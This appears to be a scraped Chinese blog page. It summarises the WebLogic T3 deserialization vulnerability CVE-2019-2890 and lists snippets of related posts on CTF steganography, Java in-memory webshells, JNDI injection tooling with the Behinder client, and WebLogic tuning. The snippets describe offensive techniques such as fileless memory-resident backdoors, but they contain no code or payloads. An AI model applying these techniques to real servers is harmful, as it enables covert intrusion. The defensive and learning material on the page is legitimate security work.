2019年10月15日,Oracle官方布了2019年10月安全更新公告,其中包含了一个可造成RCE远程任意代码执行的高危漏洞漏洞编号为CVE-2019-2890。Weblogic在利用T3协议进行远程资源加载调用时,默认会进行黑名单过滤以保证反序列化安全。本漏洞绕过了Weblogic反序列化黑名单,使攻击者可以通过T3协议对存在漏洞Weblogic组件实施远程攻击。
20220207-CTF-MISC-第11题--- base64隐写--附带脚本
qq_51550750的博客
02-07 9238
攻防世界- MISC新手区–第11题–base64隐写 下载之后解压,是stego.txt 打开stego.txt 显然是base64编码之后的结果,base64解码,我还百度翻译了一下,也没什么现。 于是想办法,因为没有MISC的基础,就去看了WP,知道是base64隐写。于是查阅资料了解了一下。 base64隐写的原理 (1)起因: 俄罗斯有个叫 Olympic_ctf 的 CTF, 在 2014 年有道 misc 题是关于 Base64 的隐写题. 大意就是给了你一段字符串, 让你找 fla
Java内存攻防实战——攻击基础篇
JavaMonsterr的博客
05-23 3213
在红蓝对抗中,攻击方广泛应用webshell等技术在防守方提供的服务中植入后门,防守方也展出各种技术来应对攻击,传统的落地型webshell很容易被攻击方检测和绞杀。而内存技术则是通过在运行的服务中直接插入运行攻击者的webshell逻辑,利用中间件的进程执行某些恶意代码,而不依赖实体文件的存在实现的服务后门,因此具有更好的隐蔽性,也更容易躲避传统安全监测设备的检测。 本文以Java语言为基础讨论内存技术的攻防,分为两个篇章,分别是攻击基础篇和防护应用篇。本篇攻击基础篇介绍了Java Servlet
Weblogic下启用Gzip压缩
高性价比服务器就选:蓝易云
03-16 410
需要注意的是,虽然Gzip压缩可以减少网络传输的数据量,但它也会增加服务器的CPU负载。因此,在启用Gzip压缩之前,你需要确保你的服务器有足够的CPU资源来处理Gzip压缩。此外,你也需要定期监控你的服务器性能,以确保Gzip压缩没有对你的服务器性能产生负面影响。在Weblogic服务器下启用Gzip压缩可以帮助减少网络传输的数据量,提升网站性能。
如何调整weblogic内存大小
热门推荐
Mr. David 专栏
02-23 4万+
<br />我们经常在使用WebLoigc部署应用程序后,现程序运行速度并不是很快,遇到这种情况我们可以尝试调整启动时分配的内存,设置方法有两种:<br />    一、在../domain/startWebLoigc.***文件中设置<br />    在startWebLogic.bat或startWebLogic.sh中找到以下内容,在其下方添加需要设置的内存Java代码 echo ***************************************************   echo 
Java Agent型内存复现及清理
vlogFeynman的博客
05-07 2753
Java Agent型内存复现及清理 本文是对互联网上内存相关资源学习整理的笔记记录,参考文章如下 利用“进程注入”实现无文件复活 WebShell 基于javaAgent内存检测查杀指南 0x01 内存简介 ########### 0x02 java agent型内存 这里记录 memshell 的复现 准备条件:1. Tomcat环境 2. inject.jar agent.jar 访问web应用,输入url ,服务端返回正常结果 将inject.jar ag..
内存涉及基础知识整理
vlogFeynman的博客
05-17 1621
Tomcat 简介 http服务器+servlet容器 部署和运行 mansger 密码文件配置 第一次如果不改都登录不进去 springboot打包 jar war的区别 Tomcat架构设计 Tomcat架构原理 几乎所有Web框架都是基于Servlet的封装,Sping应用本身就是一个Servlet,Tomcat是容器负责加载和运行Servlet 整体架构设计 一个Tomcat只有一个Server,一个Server至少一个Service 两个核心组件 A Connector----- B Co
第20篇:改造冰蝎客户端适配JNDIExploit的内存
ABC_123的博客
08-20 2280
Part1 前言JNDIExploit是一款常用的用于JNDI注入利用的工具,其大量参考/引用了 Rogue JNDI 项目的代码,支持直接植入内存shell,并集成了常见的bypass 高版本JDK的方式,适用于JNDI反序列化漏洞的利用,可直接对出网情况下的JNDI进行回显。JNDIExploit这款工具注入的冰蝎内存是经过改造后的冰蝎,网上并没有改造好的与之适配的冰蝎客户端放出来,原版...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值